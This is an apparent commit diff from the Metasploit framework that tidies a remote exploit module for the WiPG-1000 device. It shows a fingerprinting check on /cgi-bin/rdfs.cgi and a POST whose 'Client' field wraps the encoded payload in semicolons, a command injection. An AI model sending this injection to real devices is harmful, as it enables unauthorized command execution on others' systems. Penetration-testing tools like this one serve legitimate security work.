Land #8288, Minor changes to WiPG-1000 module
commit
1d86905fca
|
@ -50,12 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
|
||||
'uri' => '/cgi-bin/rdfs.cgi'
|
||||
})
|
||||
if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
|
||||
return Exploit::CheckCode::Appears
|
||||
if res && res.body.include?("Follow administrator instructions to enter the complete path")
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status('Sending request')
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
|
||||
'uri' => '/cgi-bin/rdfs.cgi',
|
||||
'vars_post' => {
|
||||
'Client' => ";#{payload.encoded};",
|
||||
'Download' => 'Download'
|
||||
|
|
Loading…
Reference in New Issue